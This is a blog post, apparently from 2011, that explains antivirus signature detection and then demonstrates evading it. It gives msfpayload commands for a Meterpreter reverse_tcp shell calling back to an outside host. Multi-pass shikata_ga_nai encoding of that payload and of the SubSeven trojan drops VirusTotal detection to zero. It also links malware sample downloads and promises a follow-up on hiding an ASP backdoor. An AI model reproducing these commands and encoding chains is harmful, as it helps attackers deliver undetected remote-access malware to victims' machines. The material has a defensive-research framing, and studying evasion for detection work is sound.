UPDATE (2016/04/26): files are now located in Malware Samples with the password “malware”
Unfortunately for consumers, antivirus companies seem to promise the world and deliver a terrible product. Why do I think this? In a few minutes of time, Google, and VirusTotal (Ref: VirusTotal and Protecting Yourself From Viruses) I can show you proof of how to take a virus, keep all of the original functionality, and make it undetectable.
How Do AntiVirus Products Work
Antivirus products rely on definitions. Those definitions primarily work by looking for files to have a certain “signature”. That signature is a particular part in the code which tends to be unique (if not, false positives occur) that can identify that file as a malware.
New technologies are trying to combine the traditional signature method of virus detection with behavioral methods. Looking at how code acts, as opposed to what it is, can have the benefit of finding malware before it appears in virus definitions. One example of behavioral detection would be if a calculator program tries to change critical Windows system files, send out an email, and connect to a remote server. These are seemingly obvious examples of things a calculator shouldn’t do, but it is hard to definitely say that that is malicious behavior. Maybe the calculator was upgrading a system file to a newer version so it could run correctly, was emailing usage reports to the developers, and checking if there was a newer version of itself. Described that way, it doesn’t sound very malicious.
How Do We Avoid Being Detected?
To avoid having our malware detected, we are going to encode it. Encoding a file takes certain aspects of the way the file works and changes them, while still producing the same output. Think for instance of the following math:
x=5+3 Answer: x=8
Now if we used an encoder that found an addition problem, and if the values in the math were higher than 2, subtracted 2. Then it added an extra line that added those values back. Example:
x=3+1 (subtracted 2 from the 5, and 2 from the 3) x=x+4 (add back the 4 subtracted from the previous line) Answer: x=8
If we then take what we just made, and RE-encode it:
x=1+1 (subtract 2 from the 3, DO NOT subtract 2 from the 1 as it is too low) x=x+2 (add back the 2 we subtracted from the last line) x=x+2 (this is the x=x+4 statement, line 2 from before, with 2 subtracted from it) x=x+2 (add back the 2 we subtracted from the last line) Answer: x=8
So now that you get the idea, it’s time to realize that how modern day executable encoding actually works is WAY more complicated. Shikata ga nai (ref Metasploit) for instance is polymorphic, meaning it won’t have the same output if you ran it against a file, then repeated the process. Rel1k did some research in this same exact area a little over a year ago on his blog SecManiac. He found that utilizing the following process was good enough to get around almost all AntiVirus on VirusTotal:
- Shikata ga nai x5
- Alpha upper x2
- Shikata ga nai x5
- Countdown x5
Getting Down and Dirty
Description: We are just going to make a reverse meterpreter shell here, that calls back to rageweb.info.
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=220.127.116.11 X > /meterpreter.exe
Output File: meterpreter reverse
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=a5a69a2a536de2a2320d2b82f8da667c1a6b3119228f941589c4952dab78f046-1302367132
Results: 23 /42 (54.8%) found as virus
File Size: 73802 bytes
File Run 1
Description: For this, we are going to make the same reverse meterpreter shell as before, but we are going to create encode it with shikata ga nai 1 time.
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=18.104.22.168 X | ./msfencode -c 1 -e x86/shikata_ga_nai > /meterpreter_1shikata.exe
Output File: meterpreter_1shikata
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=ea78c4d602919236fb41c1d0abfea5070dda48896800111e60cff71a0cf642d6-1302396583
Results: 0/ 42 (0.0%) found a virus
File Size: 321699 bytes
Around the year 2000, a virus named sub7 was extremely popular. It gave you the ability to do all kinds of things on a remote machine (screen shots, play music, etc). I found sub7 at the following site http://www.hackpr.net/~sub7/downloads.shtml
I decided to use version 2.0 for this example, as it was created Sept 19, 1999. 11.5yrs old, and unmodified in all that time, surely all of the AVs will detect it?
Description: Unmodified, downloaded from the link above. This is the one in the ss.2.0 folder in the zip file.
Output File: SubSeven
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=7981f952e6196fd8228dcc4463d4a26a9dd66ebb327078b4e5e3591d9cd70def-1302483328
Results: 35 /40 (87.5%) found as virus
File Size: 428469 bytes
Sub7v2.0 Run 1
Description: For this, we are going to take the sub7 client and encode it with shikata ga nai 1 time.
sudo cat /Downloads/SubSeven.exe | ./msfencode > /Downloads/SubSevenShikata1.exe
Output File: SubSevenShikata1
Virus Total Upload: http://www.virustotal.com/file-scan/report.html?id=a05c2c70ebe5b303f30d0911d9f7db0774988b9ff6df3bd11eb776ae8b95fd2c-1302484220
Results: 0/ 42 (0.0%) found a virus
File Size: 1867032 bytes
So far we have examined binary files, using an advanced encoder. Magic and unicorns at work here, so in my next post, we will examine a text file (ASP backdoor), and show how to alter it to avoid AV. Link will be here: http://rageweb.info/2011/05/04/bypass-av-part-2-text-edition-from-walking-to-crawling/